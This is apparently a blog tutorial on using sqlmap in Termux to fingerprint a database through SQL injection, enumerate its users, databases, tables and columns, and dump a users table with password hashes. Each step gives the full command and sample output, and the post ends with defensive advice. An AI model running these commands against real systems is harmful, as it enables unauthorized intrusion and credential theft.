Using SQLmap for Database Fingerprinting and Enumeration

Posted on by Sam Galope
Using SQLmap for Database Fingerprinting and Enumeration
Using SQLmap for Database Fingerprinting and Enumeration

Database fingerprinting is a vital step in ethical hacking and penetration testing. It helps identify the type and version of the database management system (DBMS) behind a web application. This information is crucial for tailoring further exploitation strategies, as vulnerabilities differ across MySQL, PostgreSQL, and other systems.

In this guide, we will walk through how to perform database fingerprinting and enumeration using SQLmap in Termux. With SQLmap, the process becomes highly efficient, allowing you to extract key information with minimal effort. By following these steps, you’ll learn to gather database details, enumerate tables and columns, and gain insights into the target system.

Table of Contents

Prerequisites

To get started, ensure you have:

Step 1: Install SQLmap in Termux

First, update Termux and clone the SQLmap repository:

pkg update && pkg upgrade  
pkg install git  
git clone https://github.com/sqlmapproject/sqlmap.git  
cd sqlmap

Sample Output:

Cloning into 'sqlmap'...
remote: Enumerating objects: 45348, done.
remote: Counting objects: 100% (45348/45348), done.

Step 2: Perform Basic Database Fingerprinting

To begin fingerprinting, run the following SQLmap command to identify the DBMS type and version.

python sqlmap.py -u "http://target.com/page?id=1" --banner

Explanation:

  • -u: Specifies the target URL.
  • --banner: Extracts the database banner to determine the DBMS and version.

Sample Output:

[INFO] the back-end DBMS is MySQL
Banner: '5.7.32 MySQL Community Server'

Result: The output reveals that the backend database is MySQL version 5.7.32.

Step 3: Identify Database Users

After fingerprinting the DBMS, list the database users with this command:

python sqlmap.py -u "http://target.com/page?id=1" --users

Sample Output:

Database users:
[*] root@localhost
[*] admin@localhost
[*] guest@localhost

Why This Matters

Identifying users can reveal weak accounts or help in privilege escalation during penetration testing.

Step 4: Enumerate Databases

Use SQLmap to list the available databases on the server:

python sqlmap.py -u "http://target.com/page?id=1" --dbs

Explanation:

  • --dbs: Enumerates all available databases.

Sample Output:

available databases:
[*] information_schema
[*] example_db
[*] mysql

Step 5: Enumerate Tables in a Database

Once you’ve identified a target database, list its tables:

python sqlmap.py -u "http://target.com/page?id=1" -D example_db --tables

Explanation:

  • -D: Specifies the target database.
  • --tables: Lists all tables within the specified database.

Sample Output:

Database: example_db
[1] users
[2] orders
[3] products

Step 6: Enumerate Columns in a Table

Next, enumerate the columns within a specific table, such as users:

python sqlmap.py -u "http://target.com/page?id=1" -D example_db -T users --columns

Explanation:

  • -T: Specifies the target table.
  • --columns: Lists the columns in the selected table.

Sample Output:

Table: users
[1] id INT
[2] username VARCHAR(50)
[3] password VARCHAR(255)

Step 7: Extract Data with SQLmap

Now that you know the table structure, extract the data from the users table:

python sqlmap.py -u "http://target.com/page?id=1" -D example_db -T users --dump

Explanation:

  • --dump: Extracts all data from the specified table.

Sample Output:

codeid    username    password
1     admin       5f4dcc3b5aa765d61d8327deb882cf99
2     user1       6dcd4ce23d88e2ee9568ba546c007c63

Step 8: Automate Database Fingerprinting

For a comprehensive fingerprinting and enumeration process, use SQLmap’s --all option:

python sqlmap.py -u "http://target.com/page?id=1" --all

Explanation:

  • --all: Automates the extraction of all available information about the DBMS, users, databases, tables, and data.

Sample Output (Excerpt):

Database: example_db
Tables:
  - users
  - orders
Columns in 'users':
  - id
  - username
  - password
Data in 'users':
  - admin: 5f4dcc3b5aa765d61d8327deb882cf99

Step 9: Secure the Database

Understanding how attackers perform database fingerprinting highlights the need for robust security measures. To protect your applications:

  • Use parameterized queries to prevent SQL injection attacks.
  • Implement input validation to block malicious inputs.
  • Deploy a web application firewall (WAF) to monitor and block suspicious traffic.
  • Limit user privileges to minimize the impact of potential breaches.

Conclusion

This guide covered how to use SQLmap for database fingerprinting and enumeration in Termux. SQLmap automates the process of identifying the DBMS, enumerating databases, tables, and columns, and extracting sensitive data. These techniques are essential for penetration testers, helping them understand system vulnerabilities and recommend mitigation strategies.

Always use these tools responsibly and ethically, ensuring you have proper authorization to perform testing on any web application.

Additional Resources

  1. SQLmap Documentation
  2. OWASP SQL Injection Guide

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *